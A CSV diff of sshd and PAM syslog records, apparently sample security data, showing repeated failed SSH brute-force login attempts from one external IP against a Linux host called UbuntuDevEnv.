+2214,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:09,UbuntuDevEnv,2019-06-28 05:10:08,auth,UbuntuDevEnv,info,"Disconnecting invalid user raspberry 193.201.224.232 port 7521: Change of username or service not allowed: (raspberry,ssh-connection) -> (administrator,ssh-connecti [preauth]",91935,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,raspberry,193.201.224.2,7521,,
+2215,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:10,UbuntuDevEnv,2019-06-28 05:10:10,auth,UbuntuDevEnv,info,Invalid user administrator from 193.201.224.232 port 35621,91951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,35621,,
+2216,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:10,UbuntuDevEnv,2019-06-28 05:10:10,auth,UbuntuDevEnv,info,Failed none for invalid user administrator from 193.201.224.232 port 35621 ssh2,91951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,35621,,
+2217,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:10,UbuntuDevEnv,2019-06-28 05:10:10,auth,UbuntuDevEnv,info,"Disconnecting invalid user administrator 193.201.224.232 port 35621: Change of username or service not allowed: (administrator,ssh-connection) -> (Administrator,ssh-conn [preauth]",91951,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,35621,,
+2218,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:11,UbuntuDevEnv,2019-06-28 05:10:11,auth,UbuntuDevEnv,info,Invalid user Administrator from 193.201.224.232 port 38252,91956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Administrator,193.201.224.2,38252,,
+2219,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:12,UbuntuDevEnv,2019-06-28 05:10:11,auth,UbuntuDevEnv,info,Failed none for invalid user Administrator from 193.201.224.232 port 38252 ssh2,91956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Administrator,193.201.224.2,38252,,
+2220,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:12,UbuntuDevEnv,2019-06-28 05:10:11,auth,UbuntuDevEnv,info,"Disconnecting invalid user Administrator 193.201.224.232 port 38252: Change of username or service not allowed: (Administrator,ssh-connection) -> (administrator,ssh-conn [preauth]",91956,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Administrator,193.201.224.2,38252,,
+2221,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:15,UbuntuDevEnv,2019-06-28 05:10:14,auth,UbuntuDevEnv,info,Invalid user administrator from 193.201.224.232 port 40034,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,40034,,
+2222,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:15,UbuntuDevEnv,2019-06-28 05:10:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2223,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:15,UbuntuDevEnv,2019-06-28 05:10:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2224,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:17,UbuntuDevEnv,2019-06-28 05:10:17,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 193.201.224.232 port 40034 ssh2,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,40034,,
+2225,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:17,UbuntuDevEnv,2019-06-28 05:10:17,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2226,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:20,UbuntuDevEnv,2019-06-28 05:10:19,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 193.201.224.232 port 40034 ssh2,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,40034,,
+2227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:20,UbuntuDevEnv,2019-06-28 05:10:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:22,UbuntuDevEnv,2019-06-28 05:10:21,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 193.201.224.232 port 40034 ssh2,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,40034,,
+2229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:22,UbuntuDevEnv,2019-06-28 05:10:22,auth,UbuntuDevEnv,info,"Disconnecting invalid user administrator 193.201.224.232 port 40034: Change of username or service not allowed: (administrator,ssh-connection) -> (Administrator,ssh-conn [preauth]",91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,40034,,
+2230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:22,UbuntuDevEnv,2019-06-28 05:10:22,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,91965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:24,UbuntuDevEnv,2019-06-28 05:10:24,auth,UbuntuDevEnv,info,Invalid user Administrator from 193.201.224.232 port 58194,92009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Administrator,193.201.224.2,58194,,
+2232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:24,UbuntuDevEnv,2019-06-28 05:10:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:24,UbuntuDevEnv,2019-06-28 05:10:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:27,UbuntuDevEnv,2019-06-28 05:10:26,auth,UbuntuDevEnv,info,Failed password for invalid user Administrator from 193.201.224.232 port 58194 ssh2,92009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Administrator,193.201.224.2,58194,,
+2235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:27,UbuntuDevEnv,2019-06-28 05:10:27,auth,UbuntuDevEnv,info,"Disconnecting invalid user Administrator 193.201.224.232 port 58194: Change of username or service not allowed: (Administrator,ssh-connection) -> (administrator,ssh-conn [preauth]",92009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,Administrator,193.201.224.2,58194,,
+2236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:29,UbuntuDevEnv,2019-06-28 05:10:28,auth,UbuntuDevEnv,info,Invalid user administrator from 193.201.224.232 port 19741,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,19741,,
+2237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:29,UbuntuDevEnv,2019-06-28 05:10:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:29,UbuntuDevEnv,2019-06-28 05:10:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:31,UbuntuDevEnv,2019-06-28 05:10:31,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 193.201.224.232 port 19741 ssh2,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,19741,,
+2240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:31,UbuntuDevEnv,2019-06-28 05:10:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:33,UbuntuDevEnv,2019-06-28 05:10:33,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 193.201.224.232 port 19741 ssh2,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,19741,,
+2242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:34,UbuntuDevEnv,2019-06-28 05:10:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:36,UbuntuDevEnv,2019-06-28 05:10:35,auth,UbuntuDevEnv,info,Failed password for invalid user administrator from 193.201.224.232 port 19741 ssh2,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,19741,,
+2244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:36,UbuntuDevEnv,2019-06-28 05:10:36,authpriv,UbuntuDevEnv,notice,PAM 2 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:36,UbuntuDevEnv,2019-06-28 05:10:36,auth,UbuntuDevEnv,info,"Disconnecting invalid user administrator 193.201.224.232 port 19741: Change of username or service not allowed: (administrator,ssh-connection) -> (123321,ssh-connection) [preauth]",92027,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,administrator,193.201.224.2,19741,,
+2246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:38,UbuntuDevEnv,2019-06-28 05:10:38,auth,UbuntuDevEnv,info,Invalid user 123321 from 193.201.224.232 port 29489,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:38,UbuntuDevEnv,2019-06-28 05:10:38,auth,UbuntuDevEnv,info,Failed none for invalid user 123321 from 193.201.224.232 port 29489 ssh2,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:38,UbuntuDevEnv,2019-06-28 05:10:38,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:38,UbuntuDevEnv,2019-06-28 05:10:38,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:40,UbuntuDevEnv,2019-06-28 05:10:40,auth,UbuntuDevEnv,info,Failed password for invalid user 123321 from 193.201.224.232 port 29489 ssh2,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:41,UbuntuDevEnv,2019-06-28 05:10:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:43,UbuntuDevEnv,2019-06-28 05:10:42,auth,UbuntuDevEnv,info,Failed password for invalid user 123321 from 193.201.224.232 port 29489 ssh2,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:43,UbuntuDevEnv,2019-06-28 05:10:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:45,UbuntuDevEnv,2019-06-28 05:10:45,auth,UbuntuDevEnv,info,Failed password for invalid user 123321 from 193.201.224.232 port 29489 ssh2,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:46,UbuntuDevEnv,2019-06-28 05:10:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:48,UbuntuDevEnv,2019-06-28 05:10:47,auth,UbuntuDevEnv,info,Failed password for invalid user 123321 from 193.201.224.232 port 29489 ssh2,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:48,UbuntuDevEnv,2019-06-28 05:10:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:50,UbuntuDevEnv,2019-06-28 05:10:50,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for invalid user 123321 from 193.201.224.232 port 29489 ssh2 [preauth],92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:50,UbuntuDevEnv,2019-06-28 05:10:50,auth,UbuntuDevEnv,info,Failed password for invalid user 123321 from 193.201.224.232 port 29489 ssh2,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:50,UbuntuDevEnv,2019-06-28 05:10:50,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  5 > 3,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+2261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:50,UbuntuDevEnv,2019-06-28 05:10:50,authpriv,UbuntuDevEnv,notice,PAM 4 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:50,UbuntuDevEnv,2019-06-28 05:10:50,auth,UbuntuDevEnv,info,Disconnecting invalid user 123321 193.201.224.232 port 29489: Too many authentication failures [preauth],92063,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,29489,,
+2263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:51,UbuntuDevEnv,2019-06-28 05:10:51,auth,UbuntuDevEnv,info,Invalid user 123321 from 193.201.224.232 port 5266,92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,5266,,
+2264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:52,UbuntuDevEnv,2019-06-28 05:10:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:52,UbuntuDevEnv,2019-06-28 05:10:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:53,UbuntuDevEnv,2019-06-28 05:10:53,auth,UbuntuDevEnv,info,Failed password for invalid user 123321 from 193.201.224.232 port 5266 ssh2,92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,5266,,
+2267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:56,UbuntuDevEnv,2019-06-28 05:10:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+2268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:58,UbuntuDevEnv,2019-06-28 05:10:58,auth,UbuntuDevEnv,info,Failed password for invalid user 123321 from 193.201.224.232 port 5266 ssh2,92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,5266,,
+2269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:58,UbuntuDevEnv,2019-06-28 05:10:58,auth,UbuntuDevEnv,info,"Disconnecting invalid user 123321 193.201.224.232 port 5266: Change of username or service not allowed: (123321,ssh-connection) -> (,ssh-connection) [preauth]",92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,123321,193.201.224.2,5266,,
+2270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:58,UbuntuDevEnv,2019-06-28 05:10:58,authpriv,UbuntuDevEnv,notice,PAM 1 more authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92108,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
+2271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:59,UbuntuDevEnv,2019-06-28 05:10:58,auth,UbuntuDevEnv,info,Invalid user  from 193.201.224.232 port 39624,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,39624,,
+2272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 05:10:59,UbuntuDevEnv,2019-06-28 05:10:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=193.201.224.232,92134,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,193.201.224.2,,0,
